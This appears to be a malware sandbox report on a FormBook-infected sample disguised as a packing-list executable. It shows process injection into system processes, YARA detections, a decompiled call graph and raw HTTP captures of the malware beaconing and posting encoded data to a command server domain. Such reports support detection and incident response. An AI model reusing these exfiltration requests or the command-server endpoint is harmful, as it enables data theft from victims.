                                                Data Raw: 32 63 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 64 02 81 b4 d4 4d bb 31 9a a4 91 46 bb 89 49 03 26 56 04 7b f4 92 6b 6c 48 ec 60 5f d3 86 89 ff 1d 39 c9 da 4e fc 7a c1 79 b1 ef be fb be 3b fb 2e f1 93 f9 fb d9 e2 f6 fa 1c 04 95 05 5c 7f 7c 7d 75 39 03 cf 67 ec d3 78 c6 d8 7c 31 87 cf 6f 16 6f af 20 18 0c e1 86 8c 4c 89 b1 f3 77 1e 78 82 a8 0a 19 5b af d7 83 f5 78 a0 4d ce 16 1f d8 c6 b1 04 2e ac df fa b6 8d 19 64 94 79 c9 41 dc 8a 6c ca 42 d9 e9 6f 08 82 c9 64 d2 c5 79 0e 14 16 5c e5 53 0f 95 07 db 5d 12 0b e4 59 72 00 00 10 93 a4 02 93 e3 e1 31 3c 2b 33 6e 45 04 ef 34 c1 85 5e a9 2c 66 9d b3 03 96 48 1c 9c 9e 8f df 56 b2 9e 7a 33 ad 08 15 f9 8b a6 42 0f d2 ee 34 f5 08 37 c4 9c 7e 04 a9 e0 c6 22 4d 3f 2e 2e fc 57 1e db 27 52 bc c4 a9 97 a1 4d 8d ac 48 6a b5 c7 70 a3 8d 69 8e a0 e2 39 82 d2 04 4b 97 cc 36 dc 52 53 20 50 53 61 af 95 5a eb 75 3e b7 ee 74 d6 c0 fd 52 2b f2 ad fc 8e 61 70 5c 6d 22 48 75 a1 4d 78 78 da ae 08 5a f7 92 97 b2 68 42 6e 24 2f 22 70 54 3e 2f 64 ae [TRUNCATED]
                                                Data Ascii: 2c8To0~_qdM1FI&V{klH`_9Nzy;.\|}u9gx|1oo Lwx[xM.dyAlBody\S]Yr1<+3nE4^,fHVz3B47~"M?..W'RMHjpi9K6RS PSaZu>tR+ap\m"HuMxxZhBn$/"pT>/d~l9Epr29;=&*aFpp~rv2
                                                Nov 25, 2024 13:46:15.268316031 CET354INData Raw: 9c 03 f4 49 ec 44 60 d4 8a b4 86 35 ca 5c 50 08 77 ba c8 22 28 90 08 8d 6f 2b 9e 4a 95 87 e0 07 0e f8 20 ef 8f 5b f9 f1 a4 da ec e9 57 70 bf 96 19 89 70 dc d1 fe 5a 6c 4f e0 17 b8 a4 90 af 48 47 bd c1 b4 da ad e5 01 43 ba 0a 61 ec ea dc 29 64 b2
                                                Data Ascii: ID`5\Pw"(o+J [WppZlOHGCa)d/;FR}dVfd]"fm%1 vbv+Y~ %cx0J]L$v i4Lm7ph%o$,Ak


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15192.168.2.549964104.21.49.25380
                                                TimestampBytes transferredDirectionData
                                                Nov 25, 2024 13:46:17.052710056 CET1815OUTPOST /z4gi/ HTTP/1.1
                                                Host: www.zripidro-priek.sbs
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 1245
                                                Connection: close
                                                Cache-Control: no-cache
                                                Origin: http://www.zripidro-priek.sbs
                                                Referer: http://www.zripidro-priek.sbs/z4gi/
                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910C Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                Data Raw: 36 36 79 48 49 4a 79 30 3d 67 71 7a 2b 63 4d 68 75 37 36 31 57 50 49 4b 63 50 63 6e 4b 47 33 43 47 61 47 51 42 63 61 4a 52 31 61 71 59 2f 74 41 48 50 76 54 47 52 4a 42 46 58 51 57 59 30 56 51 42 76 54 72 54 4d 38 38 2b 42 39 45 42 57 68 78 2b 61 2b 5a 78 6a 64 52 4d 74 6f 46 54 55 38 52 6b 31 64 4d 6e 4f 30 54 30 35 4e 57 53 33 54 44 42 37 4b 5a 43 7a 6c 6c 43 5a 61 59 31 48 7a 35 4d 2f 74 42 79 66 4a 50 48 6d 6f 2f 31 36 30 41 78 64 77 79 51 74 61 30 50 77 78 6c 7a 73 52 6b 6a 68 7a 4a 37 39 41 30 68 49 35 68 48 66 75 33 72 6d 6a 78 70 74 44 68 2b 2f 32 56 68 74 4e 4c 6c 4f 6c 36 57 66 78 41 44 4d 5a 42 36 4a 41 51 5a 31 51 39 6d 73 2f 70 39 2b 2f 47 56 61 50 72 4b 6f 52 50 43 6e 69 5a 52 6f 2b 49 43 33 48 6f 50 54 62 4f 42 44 79 68 39 77 50 32 67 55 37 6d 38 61 41 33 70 2f 2f 74 56 61 36 44 61 55 55 4c 77 34 4c 4a 42 7a 70 6b 59 6a 67 70 39 75 47 30 33 55 53 4e 69 73 50 6f 6c 63 39 38 71 68 63 32 66 31 35 52 61 46 66 41 56 7a 69 5a 6b 42 41 56 4e 37 55 4b 6f 4c 59 57 2b 4d 4a 7a 58 47 6e 6e 42 64 [TRUNCATED]
                                                Data Ascii: 66yHIJy0=gqz+cMhu761WPIKcPcnKG3CGaGQBcaJR1aqY/tAHPvTGRJBFXQWY0VQBvTrTM88+B9EBWhx+a+ZxjdRMtoFTU8Rk1dMnO0T05NWS3TDB7KZCzllCZaY1Hz5M/tByfJPHmo/160AxdwyQta0PwxlzsRkjhzJ79A0hI5hHfu3rmjxptDh+/2VhtNLlOl6WfxADMZB6JAQZ1Q9ms/p9+/GVaPrKoRPCniZRo+IC3HoPTbOBDyh9wP2gU7m8aA3p//tVa6DaUULw4LJBzpkYjgp9uG03USNisPolc98qhc2f15RaFfAVziZkBAVN7UKoLYW+MJzXGnnBdCNTYiPRvzQ4kLz1/rSa6IjbmsEqfTdqH3jgWmKLzjPpDSuoUB3vbRIAoGoYFejh/KKON6Cy34CJz7oULSRN1+GROIuV4aSB4NtCKf3gOnCEqs2NuHtBztD6b5+k62jJlHLGNOZ809i1vb64mpXRP4j5lPsqgnDycxubijNOcHjjZgn1xgxOSVxzhiJUDylwooKfbYvSnHxUnWCc+WSU+FdHasOZz8EjS73QZMt9T5T9mnllIx76fn8OEDSCjedxXMxPad+Pc9d2p07k76W71OjEzcWwlwKN/u56F7G/SOEMwlG6heYY+aTJLjiFsUol5s87dxE9yAwsoPDiKX8cxUPGz3Hn4i9b+2OHwo1bLi7ydW2bs/kHVP9iUMIcS66Zbl2uHoJGpD55O9VyFu6IYG812hLjTE34ckJ8XBXyQOHS9wDpYb6FpYC+oXi8ZwIrmpdpYRkkd+QjHHDv8vs4dQnKQmiQg7oWkLpS3MwMnv+q14T5hHacepdyny2RFGGtjXZxnw+mySc2th5gtYjw7H5YTudFVG2JILfH3vOceFUZ371f+pPbl4pEw70NI19QYdJRI8Gv9zK+v4SPUrWPaHx8CgHBGXTSrIqBBeiNKCXjAudkcKZvtVdCOZut4v1ZNVBsmJwmKZK+7rewEzX+vLB6PMGRa0oe1Jp [TRUNCATED]
                                                Nov 25, 2024 13:46:18.381800890 CET1236INHTTP/1.1 404 Not Found
                                                Date: Mon, 25 Nov 2024 12:46:18 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT
                                                cf-cache-status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mia4mT%2Fm5uM89UaeJK9wrs3fa4B6H3rhhGHT%2B1IvpsccoyoC9GUIvqyHWzJMwzsemfNIhD7JtsRBvjyAK2P4rSMd9W8sJwOZNclgtY%2FAszWtIcdl%2FwE2e2jrPHGV7WsYxo%2B%2BN7OSyOmb"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8e81bda29a22432b-EWR
                                                Content-Encoding: gzip
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=1658&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1815&delivery_rate=0&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                Data Raw: 32 64 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 64 02 81 b4 d4 4d bb 31 9a a4 91 46 bb 89 49 03 26 56 04 7b f4 92 6b 6c 48 ec 60 5f d3 86 89 ff 1d 39 c9 da 4e fc 7a c1 79 b1 ef be fb be 3b fb 2e f1 93 f9 fb d9 e2 f6 fa 1c 04 95 05 5c 7f 7c 7d 75 39 03 cf 67 ec d3 78 c6 d8 7c 31 87 cf 6f 16 6f af 20 18 0c e1 86 8c 4c 89 b1 f3 77 1e 78 82 a8 0a 19 5b af d7 83 f5 78 a0 4d ce 16 1f d8 c6 b1 04 2e ac df fa b6 8d 19 64 94 79 c9 41 dc 8a 6c ca 42 d9 e9 6f 08 82 c9 64 d2 c5 79 0e 14 16 5c e5 53 0f 95 07 db 5d 12 0b e4 59 72 00 00 10 93 a4 02 93 e3 e1 31 3c 2b 33 6e 45 04 ef 34 c1 85 5e a9 2c 66 9d b3 03 96 48 1c 9c 9e 8f df 56 b2 9e 7a 33 ad 08 15 f9 8b a6 42 0f d2 ee 34 f5 08 37 c4 9c 7e 04 a9 e0 c6 22 4d 3f 2e 2e fc 57 1e db 27 52 bc c4 a9 97 a1 4d 8d ac 48 6a b5 c7 70 a3 8d 69 8e a0 e2 39 82 d2 04 4b 97 cc 36 dc 52 53 20 50 53 61 af 95 5a eb 75 3e b7 ee 74 d6 c0 fd 52 2b f2 ad fc 8e 61 70 5c 6d 22 48 75 a1 4d 78 78 da ae 08 5a f7 92 97 b2 68 42 6e 24 2f 22 70 54 3e 2f 64 ae [TRUNCATED]
                                                Data Ascii: 2d3To0~_qdM1FI&V{klH`_9Nzy;.\|}u9gx|1oo Lwx[xM.dyAlBody\S]Yr1<+3nE4^,fHVz3B47~"M?..W'RMHjpi9K6RS PSaZu>tR+ap\m"HuMxxZhBn$/"pT>/d~l9Epr29;=&*aFpp~rv2
                                                Nov 25, 2024 13:46:18.381902933 CET348INData Raw: 03 f4 49 ec 44 60 d4 8a b4 86 35 ca 5c 50 08 77 ba c8 22 28 90 08 8d 6f 2b 9e 4a 95 87 e0 07 0e f8 20 ef 8f 5b f9 f1 a4 da ec e9 57 70 bf 96 19 89 70 dc d1 fe 5a 6c 4f e0 17 b8 a4 90 af 48 47 bd c1 b4 da ad e5 01 43 ba 0a 61 ec ea dc 29 64 b2 fe
                                                Data Ascii: ID`5\Pw"(o+J [WppZlOHGCa)d/;FR}dVfd]"fm%1 vbv+Y~ %cx0J]L$v i4Lm7ph%o$,Ak


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16192.168.2.549970104.21.49.25380
                                                TimestampBytes transferredDirectionData
                                                Nov 25, 2024 13:46:19.703615904 CET516OUTGET /z4gi/?66yHIJy0=tobef8QUjNtUGsCsZYmGO1WvWH56aIAOgrSm2aMJLZ6iUqk1KnrnzENErAzxTvM0Kt9VGCxiYM8pqeYnhdhOa5dKpcotDhPK6/abxg2wjtQ4wVR0RbZFA0B3ye13cpOI8A==&kb0=y00p-fqpV0lDx HTTP/1.1
                                                Host: www.zripidro-priek.sbs
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                Accept-Language: en-US,en;q=0.9
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910C Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                Nov 25, 2024 13:46:21.082176924 CET1236INHTTP/1.1 404 Not Found
                                                Date: Mon, 25 Nov 2024 12:46:20 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT
                                                cf-cache-status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1kNUT%2B2vqutbsRFez4tyuewsYGLcDrILirTekWPnHVI9kvON05mIuoEvIc3EyL13tveKJCKglqS94yHKWpM%2Faa4ipn2Vr%2BdfrSWf91cYTyuGWTvyNx5t7wa7weiUE63zIxuu9S76n2FQ"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8e81bdb36def4288-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=1784&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=516&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                Data Raw: 35 38 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e [TRUNCATED]
                                                Data Ascii: 583<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css"> body {font-size:
                                                Nov 25, 2024 13:46:21.082195044 CET1005INData Raw: 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a
                                                Data Ascii: 14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin: -3px


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:07:44:09
                                                Start date:25/11/2024
                                                Path:C:\Users\user\Desktop\packing list G25469.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\packing list G25469.exe"
                                                Imagebase:0xb30000
                                                File size:1'220'096 bytes
                                                MD5 hash:22063492B30A1BA8F06C735399A8EDC2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:2
                                                Start time:07:44:10
                                                Start date:25/11/2024
                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\packing list G25469.exe"
                                                Imagebase:0x180000
                                                File size:46'504 bytes
                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2529387256.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2531035516.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2531101341.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                Target ID:4
                                                Start time:07:44:45
                                                Start date:25/11/2024
                                                Path:C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exe"
                                                Imagebase:0x7f0000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3342260873.0000000005000000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                Target ID:5
                                                Start time:07:44:47
                                                Start date:25/11/2024
                                                Path:C:\Windows\SysWOW64\sort.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\SysWOW64\sort.exe"
                                                Imagebase:0x680000
                                                File size:24'576 bytes
                                                MD5 hash:D0D6250804C3102A17051406BBDBF3D6
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3342301156.0000000002910000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3340903495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3342241743.00000000028C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                Target ID:7
                                                Start time:07:45:01
                                                Start date:25/11/2024
                                                Path:C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exe"
                                                Imagebase:0x7f0000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3344117525.00000000053D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                Target ID:8
                                                Start time:07:45:13
                                                Start date:25/11/2024
                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                Imagebase:0x7ff79f9e0000
                                                File size:676'768 bytes
                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:4%
                                                  Dynamic/Decrypted Code Coverage:0.4%
                                                  Signature Coverage:6.9%
                                                  Total number of Nodes:2000
                                                  Total number of Limit Nodes:159
                                                  execution_graph 94437 ba19ba 94442 b4c75a 94437->94442 94441 ba19c9 94450 b3d7f7 94442->94450 94447 b4c865 94448 b4c881 94447->94448 94458 b4d1fa 48 API calls ___crtGetEnvironmentStringsW 94447->94458 94449 b50f0a 52 API calls __cinit 94448->94449 94449->94441 94459 b4f4ea 94450->94459 94452 b3d818 94453 b4f4ea 48 API calls 94452->94453 94454 b3d826 94453->94454 94455 b4d26c 94454->94455 94490 b4d298 94455->94490 94458->94447 94461 b4f4f2 __calloc_impl 94459->94461 94462 b4f50c 94461->94462 94463 b4f50e std::exception::exception 94461->94463 94468 b5395c 94461->94468 94462->94452 94482 b56805 RaiseException 94463->94482 94465 b4f538 94483 b5673b 47 API calls _free 94465->94483 94467 b4f54a 94467->94452 94469 b539d7 __calloc_impl 94468->94469 94479 b53968 __calloc_impl 94468->94479 94489 b57c0e 47 API calls __getptd_noexit 94469->94489 94470 b53973 94470->94479 94484 b581c2 47 API calls __NMSG_WRITE 94470->94484 94485 b5821f 47 API calls 7 library calls 94470->94485 94486 b51145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 94470->94486 94473 b5399b RtlAllocateHeap 94474 b539cf 94473->94474 94473->94479 94474->94461 94476 b539c3 94487 b57c0e 47 API calls __getptd_noexit 94476->94487 94479->94470 94479->94473 94479->94476 94480 b539c1 94479->94480 94488 b57c0e 47 API calls __getptd_noexit 94480->94488 94482->94465 94483->94467 94484->94470 94485->94470 94487->94480 94488->94474 94489->94474 94491 b4d2a5 94490->94491 94492 b4d28b 94490->94492 94491->94492 94493 b4d2ac RegOpenKeyExW 94491->94493 94492->94447 94493->94492 94494 b4d2c6 RegQueryValueExW 94493->94494 94495 b4d2e7 94494->94495 94496 b4d2fc RegCloseKey 94494->94496 94495->94496 94496->94492 94497 ba197b 94502 b4dd94 94497->94502 94501 ba198a 94503 b4f4ea 48 API calls 94502->94503 94504 b4dd9c 94503->94504 94506 b4ddb0 94504->94506 94510 b4df3d 94504->94510 94509 b50f0a 52 API calls __cinit 94506->94509 94509->94501 94511 b4df46 94510->94511 94513 b4dda8 94510->94513 94542 b50f0a 52 API calls __cinit 94511->94542 94514 b4ddc0 94513->94514 94515 b3d7f7 48 API calls 94514->94515 94516 b4ddd7 GetVersionExW 94515->94516 94543 b36a63 94516->94543 94518 b4de1a 94554 b4dfb4 94518->94554 94522 ba24c8 94526 b4dea4 GetCurrentProcess 94571 b4df5f LoadLibraryA GetProcAddress 94526->94571 94527 b4debb 94529 b4df31 GetSystemInfo 94527->94529 94530 b4dee3 94527->94530 94531 b4df0e 94529->94531 94565 b4e00c 94530->94565 94533 b4df21 94531->94533 94534 b4df1c FreeLibrary 94531->94534 94533->94506 94534->94533 94536 b4df29 GetSystemInfo 94538 b4df03 94536->94538 94537 b4def9 94568 b4dff4 94537->94568 94538->94531 94541 b4df09 FreeLibrary 94538->94541 94541->94531 94542->94513 94544 b36adf 94543->94544 94546 b36a6f __wsetenvp 94543->94546 94585 b3b18b 94544->94585 94547 b36ad7 94546->94547 94548 b36a8b 94546->94548 94584 b3c369 48 API calls 94547->94584 94572 b36b4a 94548->94572 94551 b36a95 94575 b4ee75 94551->94575 94553 b36ab6 ___crtGetEnvironmentStringsW 94553->94518 94555 b4dfbd 94554->94555 94556 b3b18b 48 API calls 94555->94556 94557 b4de22 94556->94557 94558 b36571 94557->94558 94559 b3657f 94558->94559 94560 b3b18b 48 API calls 94559->94560 94561 b3658f 94560->94561 94561->94522 94562 b4df77 94561->94562 94597 b4df89 94562->94597 94601 b4e01e 94565->94601 94569 b4e00c 2 API calls 94568->94569 94570 b4df01 GetNativeSystemInfo 94569->94570 94570->94538 94571->94527 94573 b4f4ea 48 API calls 94572->94573 94574 b36b54 94573->94574 94574->94551 94577 b4f4ea __calloc_impl 94575->94577 94576 b5395c __crtLCMapStringA_stat 47 API calls 94576->94577 94577->94576 94578 b4f50c 94577->94578 94579 b4f50e std::exception::exception 94577->94579 94578->94553 94589 b56805 RaiseException 94579->94589 94581 b4f538 94590 b5673b 47 API calls _free 94581->94590 94583 b4f54a 94583->94553 94584->94553 94586 b3b199 94585->94586 94588 b3b1a2 ___crtGetEnvironmentStringsW 94585->94588 94586->94588 94591 b3bdfa 94586->94591 94588->94553 94589->94581 94590->94583 94592 b3be0a ___crtGetEnvironmentStringsW 94591->94592 94593 b3be0d 94591->94593 94592->94588 94594 b4f4ea 48 API calls 94593->94594 94595 b3be17 94594->94595 94596 b4ee75 48 API calls 94595->94596 94596->94592 94598 b4dea0 94597->94598 94599 b4df92 LoadLibraryA 94597->94599 94598->94526 94598->94527 94599->94598 94600 b4dfa3 GetProcAddress 94599->94600 94600->94598 94602 b4def1 94601->94602 94603 b4e027 LoadLibraryA 94601->94603 94602->94536 94602->94537 94603->94602 94604 b4e038 GetProcAddress 94603->94604 94604->94602 94605 ba8eb8 94609 b7a635 94605->94609 94607 ba8ec3 94608 b7a635 84 API calls 94607->94608 94608->94607 94610 b7a66f 94609->94610 94614 b7a642 94609->94614 94610->94607 94611 b7a671 94650 b4ec4e 81 API calls 94611->94650 94612 b7a676 94620 b3936c 94612->94620 94614->94610 94614->94611 94614->94612 94618 b7a669 94614->94618 94616 b7a67d 94640 b3510d 94616->94640 94649 b44525 61 API calls ___crtGetEnvironmentStringsW 94618->94649 94621 b39384 94620->94621 94638 b39380 94620->94638 94622 ba4cbd __i64tow 94621->94622 94623 ba4bbf 94621->94623 94624 b39398 94621->94624 94632 b393b0 __itow Mailbox _wcscpy 94621->94632 94625 ba4bc8 94623->94625 94626 ba4ca5 94623->94626 94651 b5172b 80 API calls 3 library calls 94624->94651 94631 ba4be7 94625->94631 94625->94632 94658 b5172b 80 API calls 3 library calls 94626->94658 94629 b4f4ea 48 API calls 94630 b393ba 94629->94630 94630->94638 94652 b3ce19 94630->94652 94633 b4f4ea 48 API calls 94631->94633 94632->94629 94635 ba4c04 94633->94635 94636 b4f4ea 48 API calls 94635->94636 94637 ba4c2a 94636->94637 94637->94638 94639 b3ce19 48 API calls 94637->94639 94638->94616 94639->94638 94641 b3511f 94640->94641 94642 ba1be7 94640->94642 94659 b3b384 94641->94659 94668 b6a58f 48 API calls ___crtGetEnvironmentStringsW 94642->94668 94645 b3512b 94645->94610 94646 ba1bf1 94669 b36eed 94646->94669 94648 ba1bf9 Mailbox 94649->94610 94650->94612 94651->94632 94653 b3ce28 __wsetenvp 94652->94653 94654 b4ee75 48 API calls 94653->94654 94655 b3ce50 ___crtGetEnvironmentStringsW 94654->94655 94656 b4f4ea 48 API calls 94655->94656 94657 b3ce66 94656->94657 94657->94638 94658->94632 94660 b3b392 94659->94660 94667 b3b3c5 ___crtGetEnvironmentStringsW 94659->94667 94661 b3b3b8 94660->94661 94662 b3b3fd 94660->94662 94660->94667 94673 b3bb85 94661->94673 94664 b4f4ea 48 API calls 94662->94664 94665 b3b407 94664->94665 94666 b4f4ea 48 API calls 94665->94666 94666->94667 94667->94645 94668->94646 94670 b36f00 94669->94670 94671 b36ef8 94669->94671 94670->94648 94678 b3dd47 48 API calls ___crtGetEnvironmentStringsW 94671->94678 94674 b3bb9b 94673->94674 94677 b3bb96 ___crtGetEnvironmentStringsW 94673->94677 94675 b4ee75 48 API calls 94674->94675 94676 ba1b77 94674->94676 94675->94677 94677->94667 94678->94670 94679 b3b7b1 94688 b3c62c 94679->94688 94681 b3b7ec 94683 b3ba85 48 API calls 94681->94683 94682 b3b7c2 94682->94681 94696 b3bc74 48 API calls 94682->94696 94687 b3b6b7 Mailbox 94683->94687 94685 b3b7e0 94697 b3ba85 94685->94697 94705 b3bcce 94688->94705 94690 ba39fd 94711 b726bc 88 API calls 4 library calls 94690->94711 94692 b3c63b 94692->94690 94693 b3c68b 94692->94693 94695 b3c799 48 API calls 94692->94695 94693->94682 94694 ba3a0b 94695->94692 94696->94685 94698 b3bb25 94697->94698 94701 b3ba98 ___crtGetEnvironmentStringsW 94697->94701 94700 b4f4ea 48 API calls 94698->94700 94699 b4f4ea 48 API calls 94702 b3ba9f 94699->94702 94700->94701 94701->94699 94703 b3bac8 94702->94703 94704 b4f4ea 48 API calls 94702->94704 94703->94681 94704->94703 94706 b3bce8 94705->94706 94710 b3bcdb 94705->94710 94707 b4f4ea 48 API calls 94706->94707 94708 b3bcf2 94707->94708 94709 b4ee75 48 API calls 94708->94709 94709->94710 94710->94692 94711->94694 94712 b3f030 94715 b43b70 94712->94715 94714 b3f03c 94716 b442a5 94715->94716 94717 b43bc8 94715->94717 94822 b7cc5c 86 API calls 4 library calls 94716->94822 94718 b43bef 94717->94718 94720 ba6fd1 94717->94720 94722 ba6f7e 94717->94722 94729 ba6f9b 94717->94729 94719 b4f4ea 48 API calls 94718->94719 94721 b43c18 94719->94721 94810 b8ceca 335 API 